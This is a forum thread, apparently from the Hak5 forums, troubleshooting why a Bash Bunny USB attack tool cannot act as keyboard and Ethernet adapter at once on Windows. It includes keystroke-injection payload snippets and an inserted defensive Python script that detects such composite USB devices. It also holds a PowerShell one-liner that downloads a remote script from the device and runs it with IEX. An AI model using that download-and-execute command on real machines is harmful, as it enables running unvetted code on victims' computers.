Composite device not working correctly (Windows)


Seczilla

When using the following at the same time the BB is not recognized as an Ethernet adapter.

ATTACKMODE RNDIS_ETHERNET HID

I thought that this would be a feature of the BB to combine attack modes at the same time. I know I can do them after each other but that makes it just more complicated in some cases.

I have seen in some examples that they use HID to create a loop in PowerShell to check for the connection with Test-Connection and after that switch the attack mode to RNDIS_ETHERNET.

That just creates the following problem for me.

C:\WINDOWS\system32>powershell "while ($true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/test.ps1');exit}}"

Test-Connection : Testing connection to computer '172.16.64.1' failed: Error due to lack of resources
At line:1 char:20
+ while ($true) {If (Test-Connection 172.16.64.1 -count 1) { ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (172.16.64.1:String) [Test-Connection], PingException
    + FullyQualifiedErrorId : TestConnectionException,Microsoft.PowerShell.Commands.TestConnectionCommand

Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:77
+ ... IEX (New-Object Net.WebClient).DownloadString('http://172 ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

Is there any update planned to fix the behavior in Windows that we can actually use the attack modes at the same time?

While I don't like the workaround mentioned above it would work if I would not get the message "Unable to connect to the remote server". If I execute it manually a few seconds later it works just fine. Any ideas? Thank you in advance.

This Wiki has some good information about valid Attack Mode combinations:

http://wiki.bashbunny.com/#!./index.md#Bunny_Script

You don't have to put all your attack modes in one line at the same time either. If you want to start as a keyboard, just start with the HID attack mode. Switch to Ethernet when necessary, and then switch to Storage if you want. All that said, I think your combination might be backwards. Try doing this instead, to match valid combo structure and let us know if it resolves your issue:

ATTACKMODE HID RNDIS_ETHERNET

 


Thanks @Decoy. The Wiki was the first read I had.

I know I don't have to do them all at the same time but I don't like switching between HID and Ethernet for example. The reason is that it creates delays every time I switch.

Take this example:

LED R B
#ATTACKMODE HID RNDIS_ETHERNET

ATTACKMODE RNDIS_ETHERNET
ATTACKMODE HID 
LED G

Q GUI
Q DELAY 500
Q STRING cmd.exe
Q DELAY 100
Q ENTER
Q DELAY 500
Q STRING ping -t 172.16.64.1
Q ENTER

At first it creates the Ethernet interface just fine. Then it switches to HID and the Ethernet goes away (as expected). ATTACKMODE HID RNDIS_ETHERNET does not work either. It will fail to create the Ethernet interface and after that starts typing. 

At https://forums.hak5.org/index.php?/topic/40246-windows-10-support/ it looks like I am not the only one having this issue. @Darren Kitchen said: 

Quote

 

The default switch2 payload recognizes as storage but not Ethernet on Windows. Same thing with Mac. Go figure - it works on my development Linux box. The issue has to do with composite devices and Windows' ability to recognize RNDIS as one.

When combining attack modes the Bash Bunny registers as a composite device. Windows doesn't recognize RNDIS_ETHERNET as a composite device by default. Drivers could be installed, but that defeats the purpose in many instances. Alone ATTACKMODE RNDIS_ETHERNET works without drivers on Windows hosts. Thankfully the ATTACKMODE command can be run subsequently to change the state to other modes later on in payloads conditionally.

 

So the only way I found it was working on Windows is using HID first to create a loop and wait for the Ethernet connection to come to life. Not a sexy solution - more like a workaround. Technically it should be possible to have the BB register as HID AND Ethernet at the same time.
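Added example, not part of the original thread or of any Hak5 code: a defender-side check that walks a USB configuration descriptor and flags a single device presenting both a boot keyboard and an RNDIS function, the composite layout described in the quote above. The descriptors are constructed, simplified samples (not captured from a Bash Bunny), and the RNDIS class-code list is an assumption about how such a device may advertise itself.

```python
import struct

# (class, subclass, protocol) triples from the USB-IF defined class codes.
HID_KEYBOARD = (0x03, 0x01, 0x01)   # HID, boot interface, keyboard
RNDIS_CONTROL = {                   # assumption: ways a device may advertise RNDIS
    (0xE0, 0x01, 0x03),             # Wireless Controller: Remote NDIS
    (0xEF, 0x04, 0x01),             # Miscellaneous: RNDIS over Ethernet
    (0x02, 0x02, 0xFF),             # CDC ACM, vendor-specific protocol
}

def parse_interfaces(config: bytes):
    """Return (number, class, subclass, protocol) for each interface in a
    USB configuration descriptor, skipping all other descriptor types."""
    found, pos = [], 0
    while pos < len(config):
        length = config[pos]
        if length < 2 or pos + length > len(config):
            raise ValueError(f"malformed descriptor at offset {pos}")
        # 0x04 = INTERFACE descriptor; count only alternate setting 0
        if config[pos + 1] == 0x04 and length >= 9 and config[pos + 3] == 0:
            found.append((config[pos + 2], *config[pos + 5:pos + 8]))
        pos += length
    return found

def functions(config: bytes):
    """Return which functions of interest the configuration exposes."""
    triples = {i[1:] for i in parse_interfaces(config)}
    out = {"keyboard"} if HID_KEYBOARD in triples else set()
    return out | ({"rndis"} if triples & RNDIS_CONTROL else set())

def is_keyboard_plus_network(config: bytes) -> bool:
    return functions(config) == {"keyboard", "rndis"}

# --- constructed, simplified sample descriptors (not from real hardware) ---
def _iface(num, cls, sub, proto, n_eps):
    return bytes([9, 0x04, num, 0, n_eps, cls, sub, proto, 0])

def _config(n_ifaces, body):
    head = struct.pack("<BBHBBBBB", 9, 0x02, 9 + len(body), n_ifaces, 1, 0, 0x80, 250)
    return head + body
_EP_IN = bytes([7, 0x05, 0x81, 0x03, 8, 0, 10])   # interrupt IN endpoint
RNDIS_PAIR = _iface(0, 0xE0, 0x01, 0x03, 1) + _EP_IN + _iface(1, 0x0A, 0, 0, 0)
KEYBOARD = _iface(2, 0x03, 0x01, 0x01, 1) + _EP_IN
COMPOSITE = _config(3, RNDIS_PAIR + KEYBOARD)
RNDIS_ONLY = _config(2, RNDIS_PAIR)

if __name__ == "__main__":
    for name, cfg in (("composite", COMPOSITE), ("rndis only", RNDIS_ONLY)):
        print(name, parse_interfaces(cfg), is_keyboard_plus_network(cfg))
```
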


13 minutes ago, Seczilla said:

Thanks @Decoy. The Wiki was the first read I had.

I know I don't have to do them all at the same time but I don't like switching between HID and Ethernet for example. The reason is that it creates delays every time I switch.

Take this example:


LED R B
#ATTACKMODE HID RNDIS_ETHERNET

ATTACKMODE RNDIS_ETHERNET
ATTACKMODE HID 
LED G

Q GUI
Q DELAY 500
Q STRING cmd.exe
Q DELAY 100
Q ENTER
Q DELAY 500
Q STRING ping -t 172.16.64.1
Q ENTER

At first it creates the Ethernet interface just fine. Then it switches to HID and the Ethernet goes away (as expected). ATTACKMODE HID RNDIS_ETHERNET does not work either. It will fail to create the Ethernet interface and after that starts typing. 

At https://forums.hak5.org/index.php?/topic/40246-windows-10-support/ it looks like I am not the only one having this issue. @Darren Kitchen said: 

So the only way I found it was working on Windows is using HID first to create a loop and wait for the Ethernet connection to come to life. Not a sexy solution - more like a workaround. Technically it should be possible to have the BB register as HID AND Ethernet at the same time.

Why are you instantly changing attackmode? You can change it halfway through your code.

Doing this

ATTACKMODE RNDIS_ETHERNET
ATTACKMODE HID

does not make it do both at the same time... It only swaps out the mode. E.g. will end up in HID mode.

Decoy meant something like this:

ATTACKMODE HID
Q GUI r
Q DELAY 200
Q STRING cmd
Q ENTER
Q DELAY 500
Q STRING echo You numpty
Q ENTER
ATTACKMODE RNDIS_ETHERNET
python -m SimpleHTTPServer 8080

This starts up a CMD prompt, says something in it and then starts up a python server afterwards.


3 hours ago, Dave-ee Jones said:

Why are you instantly changing attackmode? You can change it halfway through your code.

Doing this


ATTACKMODE RNDIS_ETHERNET
ATTACKMODE HID

does not make it do both at the same time... It only swaps out the mode. E.g. will end up in HID mode.

Decoy meant something like this:


ATTACKMODE HID
Q GUI r
Q DELAY 200
Q STRING cmd
Q ENTER
Q DELAY 500
Q STRING echo You numpty
Q ENTER
ATTACKMODE RNDIS_ETHERNET
python -m SimpleHTTPServer 8080

This starts up a CMD prompt, says something in it and then starts up a python server afterwards.

Yes, I apologise if that wasn't clear. 


It does seem like you could be running into the issues described in the thread you linked. When I test your example payload on Win 10, with RNDIS_ETHERNET and HID, Windows reports "driver unavailable" and no new ethernet interface is presented.

It seems like this is a limitation of the platform at present. RNDIS and HID are a valid combination, from the perspective of the bunny, but it looks like Win10 isn't playing ball.


7 hours ago, Decoy said:

Yes, I apologise if that wasn't clear. 

Yes sorry, I know that it does not make sense. It was just to show that changing it will remove the Ethernet device again and I can not use the Ethernet connection in HID mode then (unless I have a loop that waits for the Ethernet connection to be available).

I was not sure if this is an issue with just Windows 10 or if every version of Windows is affected. I think there are devices that work with RNDIS and HID at the same time in Windows 10, so it must be possible somehow. The question for me was just how it can be done. I have working code now, but I thought this is not the best way to do it as it creates delays and officially the bunny should be able to do that. Maybe someone else had it figured out, but it doesn't look like it.

Thanks all for your comments.
